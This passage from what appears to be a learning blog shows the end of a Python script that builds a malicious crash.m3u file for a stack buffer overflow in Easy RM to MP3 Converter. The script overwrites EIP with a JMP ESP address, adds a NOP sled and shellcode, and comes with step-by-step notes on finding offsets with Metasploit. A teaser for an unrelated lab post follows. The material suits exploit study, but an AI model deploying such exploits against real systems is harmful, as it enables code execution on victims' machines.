# Address for JMP ESP 0x01a8f23a - This address goes in as EIP
eip  = "\x3a\xf2\xa8\x01"
junk += eip
junk += "C"*4 # Offset to where the ESP points to
junk += "\x90" * 8
junk += buf
junk += "\x41" * (30000 - len(junk))

file.write(junk)
file.close()

# v1 Script
# Mounted a file share on a WinXPSP2 box
# Create the crash.m3u file and then send it over to the file share
# Open the file using the vulnerable Easy RM to MP3 Converter
# Crashes the application by overwriting the EIP register 

# v2 Script
# Created a pattern using pattern_create with metasploit
# ./pattern_offset.rb 42336a42
# [*] Exact match at offset 1059
# 25000 + 1059 = 26059 offset for the EIP address

# v3 Script
# Verify that at the offset where EIP is overwritten is the letter of B or \x42

# v4 Script
# We notice that Extended Stack Pointer points to where the C's
# However the offset to the first C we are not sure of
# Introduce a pattern of 20 bytes to find the offset

# v5 Script
# Identified that the offset to where the ESP points to is on the 5th byte of the pattern
# Substituted out the letter C in the pattern and then added C to compensate for the offset
# What is seen in ESP should start with the letter D in the pattern

# v6 Script
# Identify an instruction in another dll file that will do jmp esp
# Found a memory address of 0x01a8f23a
# Created shellcode and place where the pattern is located

All of the files that I created as I went through the tutorial are located on my drive located here.

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...